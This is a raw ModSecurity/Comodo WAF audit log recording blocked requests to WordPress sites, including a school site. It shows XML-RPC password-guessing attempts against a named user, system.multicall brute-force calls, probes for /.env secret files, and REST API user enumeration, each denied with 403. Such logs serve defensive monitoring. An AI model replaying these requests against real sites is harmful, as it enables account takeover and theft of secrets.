"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117712772883 4390 (- - -) Stopwatch2: 1749117712772883 4390; combined=3364, p1=382, p2=2795, p3=0, p4=0, p5=108, sr=80, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --405df33a-Z-- --b9f9d503-A-- [05/Jun/2025:17:02:58 +0700] aEFrUuth7G2xELALzPZWGwAAAMw 103.236.140.4 45872 103.236.140.4 8181 --b9f9d503-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b9f9d503-C-- wp.getUsersBlogs kasubagtu 11185 --b9f9d503-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9f9d503-E-- --b9f9d503-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117778041696 4841 (- - -) Stopwatch2: 1749117778041696 4841; combined=3527, p1=422, p2=2914, p3=0, p4=0, p5=110, sr=86, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9f9d503-Z-- --46736b39-A-- [05/Jun/2025:17:03:12 +0700] aEFrYOth7G2xELALzPZWJwAAAMg 103.236.140.4 45902 103.236.140.4 8181 --46736b39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --46736b39-C-- wp.getUsersBlogs kasubagtu 1234%^&* --46736b39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46736b39-E-- --46736b39-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117792716119 4393 (- - -) Stopwatch2: 1749117792716119 4393; combined=3362, p1=376, p2=2821, p3=0, p4=0, p5=98, sr=77, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46736b39-Z-- --a8251533-A-- [05/Jun/2025:17:03:12 +0700] aEFrYOth7G2xELALzPZWKAAAAM8 103.236.140.4 45904 103.236.140.4 8181 --a8251533-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 34.105.188.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 34.105.188.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --a8251533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8251533-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749117792861885 669 (- - -) Stopwatch2: 1749117792861885 669; combined=284, p1=225, p2=0, p3=0, p4=0, p5=59, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8251533-Z-- --24e33674-A-- [05/Jun/2025:17:03:13 +0700] aEFrYeth7G2xELALzPZWKQAAANM 103.236.140.4 45906 103.236.140.4 8181 --24e33674-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 34.105.188.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 34.105.188.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --24e33674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24e33674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749117793512613 621 (- - -) Stopwatch2: 1749117793512613 621; combined=252, p1=217, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24e33674-Z-- --0e54ee3f-A-- [05/Jun/2025:17:03:58 +0700] aEFrjuth7G2xELALzPZWTQAAAME 103.236.140.4 45984 103.236.140.4 8181 --0e54ee3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --0e54ee3f-C-- wp.getUsersBlogs kasubagtu z1x2c3v4 --0e54ee3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e54ee3f-E-- --0e54ee3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117838283090 4486 (- - -) Stopwatch2: 1749117838283090 4486; combined=3420, p1=392, p2=2825, p3=0, p4=0, p5=116, sr=84, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e54ee3f-Z-- --9367eb70-A-- [05/Jun/2025:17:04:59 +0700] aEFry-th7G2xELALzPZWfAAAAMo 103.236.140.4 46090 103.236.140.4 8181 --9367eb70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --9367eb70-C-- wp.getUsersBlogs kasubagtu pepper --9367eb70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9367eb70-E-- --9367eb70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117899928067 4298 (- - -) Stopwatch2: 1749117899928067 4298; combined=3293, p1=398, p2=2730, p3=0, p4=0, p5=96, sr=117, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9367eb70-Z-- --b8aef436-A-- [05/Jun/2025:17:05:26 +0700] aEFr5n-K7ToMdu-YSIJSJgAAAAc 103.236.140.4 46110 103.236.140.4 8181 --b8aef436-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.159.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.159.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8aef436-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8aef436-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117926279691 2112 (- - -) Stopwatch2: 1749117926279691 2112; combined=1062, p1=341, p2=693, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8aef436-Z-- --4cc75d78-A-- [05/Jun/2025:17:06:00 +0700] aEFsCOth7G2xELALzPZWpQAAAMo 103.236.140.4 46196 103.236.140.4 8181 --4cc75d78-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4cc75d78-C-- wp.getUsersBlogs kasubagtu thomas --4cc75d78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cc75d78-E-- --4cc75d78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117960902275 5350 (- - -) Stopwatch2: 1749117960902275 5350; combined=3761, p1=459, p2=3113, p3=0, p4=0, p5=118, sr=97, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cc75d78-Z-- --50a89254-A-- [05/Jun/2025:17:06:28 +0700] aEFsJH-K7ToMdu-YSIJSNAAAAAE 103.236.140.4 46274 103.236.140.4 8181 --50a89254-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --50a89254-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix000 --50a89254-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50a89254-E-- --50a89254-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749117988054864 4525 (- - -) Stopwatch2: 1749117988054864 4525; combined=3588, p1=381, p2=3041, p3=0, p4=0, p5=96, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50a89254-Z-- --8c9e5f5b-A-- [05/Jun/2025:17:07:00 +0700] aEFsROth7G2xELALzPZWwQAAANA 103.236.140.4 46374 103.236.140.4 8181 --8c9e5f5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8c9e5f5b-C-- wp.getUsersBlogs kasubagtu sparky --8c9e5f5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c9e5f5b-E-- --8c9e5f5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118020098306 4441 (- - -) Stopwatch2: 1749118020098306 4441; combined=3290, p1=340, p2=2755, p3=0, p4=0, p5=111, sr=77, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c9e5f5b-Z-- --d8f76370-A-- [05/Jun/2025:17:07:54 +0700] aEFseirHpfaS2Cuwh8UFYAAAAFc 103.236.140.4 46470 103.236.140.4 8181 --d8f76370-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.81.182.244 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.81.182.244 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d8f76370-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh_2019 --d8f76370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8f76370-E-- --d8f76370-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.81.182.244 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749118074042044 5116 (- - -) Stopwatch2: 1749118074042044 5116; combined=3785, p1=425, p2=3189, p3=0, p4=0, p5=102, sr=101, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8f76370-Z-- --fd0bca05-A-- [05/Jun/2025:17:08:00 +0700] aEFsgOth7G2xELALzPZWyAAAANE 103.236.140.4 46476 103.236.140.4 8181 --fd0bca05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fd0bca05-C-- wp.getUsersBlogs kasubagtu linuxsec --fd0bca05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd0bca05-E-- --fd0bca05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118080588103 5555 (- - -) Stopwatch2: 1749118080588103 5555; combined=4093, p1=476, p2=3217, p3=0, p4=0, p5=215, sr=100, sw=185, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd0bca05-Z-- --6b7d6851-A-- [05/Jun/2025:17:09:00 +0700] aEFsvFwdJdhOudw5hdz47gAAAIk 103.236.140.4 46644 103.236.140.4 8181 --6b7d6851-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6b7d6851-C-- wp.getUsersBlogs kasubagtu chester --6b7d6851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b7d6851-E-- --6b7d6851-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118140374942 4383 (- - -) Stopwatch2: 1749118140374942 4383; combined=3417, p1=381, p2=2864, p3=0, p4=0, p5=100, sr=82, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b7d6851-Z-- --da489678-A-- [05/Jun/2025:17:09:43 +0700] aEFs51wdJdhOudw5hdz5NQAAAII 103.236.140.4 46806 103.236.140.4 8181 --da489678-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --da489678-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2007 --da489678-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da489678-E-- --da489678-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749118183758227 4394 (- - -) Stopwatch2: 1749118183758227 4394; combined=3443, p1=360, p2=2905, p3=0, p4=0, p5=107, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da489678-Z-- --973e4608-A-- [05/Jun/2025:17:10:00 +0700] aEFs-FwdJdhOudw5hdz5PAAAAJM 103.236.140.4 46830 103.236.140.4 8181 --973e4608-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --973e4608-C-- wp.getUsersBlogs kasubagtu 741852963 --973e4608-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --973e4608-E-- --973e4608-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749118200147780 5065 (- - -) Stopwatch2: 1749118200147780 5065; combined=3730, p1=457, p2=3105, p3=0, p4=0, p5=99, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --973e4608-Z-- --7968612b-A-- [05/Jun/2025:17:11:00 +0700] aEFtNOth7G2xELALzPZXKwAAAMU 103.236.140.4 46920 103.236.140.4 8181 --7968612b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7968612b-C-- wp.getUsersBlogs administrator OpF^MJrUK$SzYcOrfG --7968612b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7968612b-E-- --7968612b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
